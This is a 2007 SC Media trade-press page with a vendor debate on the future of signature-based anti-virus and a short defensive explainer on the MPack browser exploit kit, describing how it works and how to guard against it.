Debate | SC Media

Debate

August 7, 2007

FOR, by Steve Orenberg, president, Kaspersky Lab 

The death knell for signature-based anti-virus protection has sounded every year for over a decade. To quote ESG analyst Jon Oltsik, "Saying signature based anti-virus software is dead is like saying airbags made seatbelts obsolete. In fact, airbags simply made seatbelts a part of overall safety..."

Sophisticated malware writers continue to try new avenues to circumvent signature-based anti-virus, precisely because it's doing something right. Signature-based anti-virus is not a panacea. However, engines that incorporate string scanning are a crucial component of every traditional anti-virus product as a first defense in detecting the majority of existing malicious code.

The solution isn't abolition, but consortium with proactive detection technologies and complementary fixes — such as firewall, anti-spam and IPS — in order to collectively address the latest multi-layered threats. Although, with the addition of other security technologies its role has changed, signature-based anti-virus is very much alive and well.

 

AGAINST, by Amrit Williams, CTO, BigFix

Stand-alone anti-virus is simply not protecting corporate desktops against an increasingly hostile threat-environment. Nothing can disguise the fact that anti-virus tools have become commodity items with little to separate competing vendors.

As endpoint-level features and functions become more generic, it is higher level management and integration characteristics that differentiate anti-virus remedies. Manageability includes the quality and usability of the user interface; ability to deliver anti-virus protection to all vulnerable systems; remediation speed; payload delivery accuracy; and deep visibility into endpoint configurations and status.

Furthermore, it is becoming critical to deliver anti-virus services integrated with other security and system management functions.

As stand-alone anti-virus tools consolidate into integrated endpoint management solutions, they are becoming product features. Consolidating anti-virus into consolidated management solutions is where the industry is going and what customers demand.

 

THREAT OF THE MONTH:
MPack

What is it?

MPack is a modular PHP framework that helps create JavaScript-driven web browser exploits. MPack is released in various versions that contain multiple exploits targeting browser functionality, ActiveX controls and add-ons.

How does it work?

Potential victims are driven to the MPack site via spammed link enticements, DNS poisoning or website compromise, starting the attack cycle. When a user's computer lands on the site, the PHP code on the index.php page will detect the user's browser, version and OS. The IP address is recorded and the geolocation inferred from the IP address is stored in the database. Then, based on the browser and version installed, a series of exploits are launched to infect the victim with malware.

Should I be worried?

We've seen widespread website alterations in the past few weeks which have been designed to load IFRAME elements onto the main pages of websites that contain an MPack exploit site.

How can I prevent it?

Unfortunately there is no silver bullet to prevent this attack. Keep all of your software updated with the latest patches. Disabling JavaScript and ActiveX controls may prevent the exploits from working. Stripping the User-Agent string in the requests may also be used to defeat the attack fingerprinting.

— Jose Nazario, Arbor Networks

 

prestitial ad